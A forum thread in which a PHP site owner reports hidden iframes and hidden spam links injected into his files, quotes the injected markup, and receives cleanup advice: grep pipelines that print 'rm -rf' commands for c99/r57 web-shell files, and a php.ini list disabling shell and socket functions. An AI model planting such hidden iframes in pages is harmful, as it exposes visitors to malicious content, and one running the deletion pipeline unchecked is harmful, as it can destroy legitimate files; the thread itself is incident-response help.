there are so many MASTER MIND guys here and i need help, please help. i am running a site, today i was editing meta tags and some other information i saw following code was added in the file. i checked all php files and this code was almost in every file. <iframe src="http://spl.kerrq.com/vonline/count.html" name="banner" marginheight="1" frameborder="No" align="bottom" width="1" height="1" atomicselection="false" application="no" style="visibility: hidden"></iframe><U style="DISPLAY: none"><a href=http://toyota-.darseo.co.cc/>Toyota</a></U><iframe src="http://spl.kerrq.com/vonline/count.html" name="banner" marginheight="1" frameborder="No" align="bottom" width="1" height="1" atomicselection="false" application="no" style="visibility: hidden"></iframe> Code (markup): i did some google and found following reason for that 1 - third party scripts are outdated on hosting 2 - third party scripts have security holes etc. 3 - directory permissions are not set properly etc. well none of the case is with me because i codded all the site by myself i have 5 years php experience so code is well written and directory permission is all good. I checked all files on my local server they are all fine. i mailed hosting company they said its script problem not hosting. i am dieing please help. Google and other search engine can bann me bcoz of that. i saw the following forum but i don't have shell access so i couldn't do that http://www.bwseo.com/seo_forum/showthread.php?p=1#post1 thanks in advance
5 years of php experience is not a reason to think your code is 100% safe. Some WP and Joomla coders have much more experience, still they release security patches every once in a while. I'll add some other reasons: 1. The whole server has been compromised (every site is affected) 2. You own computer is infected and some trojan has stolen your passwords.
Easy to prevent if you have dedicated server or ssh access to you Unix host. You can make the hackers cry for mommy's milk, but they find none on your host. Follow these steps. Check your httpd access log for hacker entries. It's not usually a case of stolen passwords. Hacker doesn't use em for iframe injection. Ignore what you read elsewhere. Flaw in UNIX operating system and security of your server permits this hack. First scan site for unusual files in /tmp. You may find a perl or shell script that is no good. Rename, remove or disable it however you can. Chmod it to 400 and rename at minimum. Next scan for C99 or r57 files which may now be on your host find /var/www/ -name "*".php -type f -print0 | xargs -0 grep r57 | uniq -c | sort -u | cut -d":" -f1 | awk '{print "rm -rf " $2}' | uniq find /var/www/ -name "*".php -type f -print0 | xargs -0 grep c99 | uniq -c | sort -u | cut -d":" -f1 | awk '{print "rm -rf " $2}' | uniq Note above not guranteed to find the files, if named cleverly. If any found just remove them. Next secure php. Add the following to php.ini disable_functions = symlink,ini_restore,imap_body,imap_list,imap_open,mysql_list_dbs,popen,socket_select,socket_create,socket_create_listen,socket_create_pa ir,socket_listen,socket_accept,socket_bind,socket_strerror,readlink,symlink,link,pfsockopen,ini_alter,dl,openlog,syslog,pcntl_exec,pcntl_fork,p cntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,fpassthru,detcwd,system,passthru,exec,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec and reboot server. Note the essential function to disable is the passthru. At this point you may need to change ftp passwords to site.
As far as I can read the commands, they don't check filenames at all. They just search for .php files in "/var/www" and print "rm -rf" command for the found files with "c99" or "r57" strings in them. Instead of "/var/www" you should specify your own site's root directory. And don't hurry to remove the found files. They may happen to contain legitimate inclusions of the character sequences (c99 or r57).
When trying to figure out how you got hacked, it helps to go from the largest to the smallest possibility. First thing to do is to check with your host to make sure that the entire server didn't get hacked. Since this usually doesn't happen too often if you have a good, large, host, you should be fine. However ask anyway. Next step is to disable the blackhat hacker's access. Hackers access sites many ways, but some require more skill than others, and, as a result, most use what's called a web shell (i'll go over the other ways later). It's basically a php script (sometimes it may be .asp or .js though, so watch out) that the blackhat hacker uploads onto your site after exploiting a flaw in the script or directory permissions (RFI/LFI). SQL Injection can be used too, but that's a little different. Anyway, so the first thing to do is check all php, asp, js, and aspx scripts that you have on the site. Don't take any chances, go through every one. Sometimes there may be two or three, in different places. Ok, so now you've cleaned the web shell, or you haven't found one. Either way, we'll continue on to detecting other methods of access. After a web shell, things can get tricky. The blackhat hacker could've uploaded a LKM or bin rootkit (however, this is beyond the scope of most people, and requires server access in most cases), dumped and decrypted your passwords (usually via SQL Injection), or even just have the login details for your FTP server. It's most likely one of the last two. Therefore, you'll want to change your passwords for EVERYTHING. Also remember to try not to include common or dictionary words in your pass. Mine are usually in the form of some numbers followed by upper and lower case letters, and then symbols. Example: 123AppleBeagle@@#. You don't have to make it random unless you're encrypting something, as bruteforcing is impractical these days, and most password hash crackers will take years to get a password like the one above. Anyway, once you've confirmed that you checked all the scripts, and that the server is safe, and that you changed your passes for everything (FTP, cPanelm, Wordpress, etc.), you can probably relax. If it happens again, just post back here, and we'll see what we can do to help you. Oh just a side note here, I wouldn't make checking logs a top priority. Download them at first to make sure that you have them, then do the above, then look at the logs. Also remember that 95% of the time the blackhat hacker has used a proxy or VPN, and the chances of getting his real IP are next to none. Good luck!!
Great post! While logs may not be very useful in terms of tracking the bad guys, they may provide enough information to locate the security hole if it was an SQL injection or some similar attack.